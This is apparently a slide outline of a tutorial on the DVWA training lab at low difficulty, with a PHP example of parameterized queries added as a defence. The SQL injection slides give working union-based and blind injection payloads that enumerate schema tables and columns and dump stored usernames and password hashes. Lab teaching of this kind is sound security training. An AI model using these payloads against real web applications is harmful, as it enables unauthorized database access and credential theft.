Dvwa low level

Published in: Technology

  1. DVWA - Damn Vulnerable Web Application: Dvwa low level
  2. 1. Brute Force
  3. 2. Command Injection
  4. 3. CSRF
  5. 4. File Inclusion
  6. 5. SQL Injection
  7. SQL Injection Source
  8. SQL query assembly
       $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
     Test whether an error occurs:
       1' and 1=1#
     After assembly the query becomes:
       "select first_name,last_name from users where user_id = '1' and 1=1#";
  9. 5. SQL Injection
       1' order by 1#
       1' union all select 1,2#
       1' union all select user(),database()#
       1' union all select null,table_name from information_schema.tables#
       1' union all select null,table_name from information_schema.tables where table_schema = 'dvwa'#
       1' union all select null,column_name from information_schema.columns where table_schema ='dvwa'#
  10. 5. SQL Injection
       1' union all select user,password from users#
  11. 6. Blind SQL Injection: the difference
  12. 6. Blind SQL Injection
     We can first check the version:
       1' union all select null,substring(@@version,1,1)=4#
  13. 7. File Upload
  14. 8. Reflected Cross Site Scripting (XSS)
  15. 9. Stored Cross Site Scripting (XSS)
  16. Dvwa medium level: to be continued. vance@hst.tw
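
The query on slide 8 places `$id` inside the SQL text, which is why the input can change the statement. As an added example (not DVWA's own code and not from the slides), here is the same lookup in both forms. It assumes PHP with the pdo_sqlite extension and a constructed in-memory `users` table so it runs offline (DVWA itself uses MySQL); the function names are hypothetical.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for DVWA's users table (DVWA itself runs on MySQL).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)');
$pdo->exec("INSERT INTO users VALUES (1, 'Alice', 'Example'), (2, 'Bob', 'Sample')");

// Slide 8 pattern: the input is spliced into the SQL text, so a quote
// character in $id ends the string literal and the rest is parsed as SQL.
// The string is only assembled here, never executed.
function assembleConcatenated(string $id): string
{
    return "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
}

// Hardened form: validate the expected shape, then send the value as a bound
// parameter so it cannot alter the statement's structure.
function lookupUser(PDO $pdo, string $id): array
{
    if (!ctype_digit($id)) {
        return [];                      // not a plain non-negative integer
    }
    $stmt = $pdo->prepare(
        'SELECT first_name, last_name FROM users WHERE user_id = :id LIMIT 1'
    );
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$inputs = ['1', "1' and 1=1#"];         // second value is the slide 8 test string
foreach ($inputs as $input) {
    echo "input:        $input\n";
    echo "concatenated: " . assembleConcatenated($input) . "\n";
    echo "bound rows:   " . json_encode(lookupUser($pdo, $input)) . "\n\n";
}
```

The validation step rejects the slide 8 string before any query runs, and the bound parameter keeps the value out of the SQL text even if validation is later loosened.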
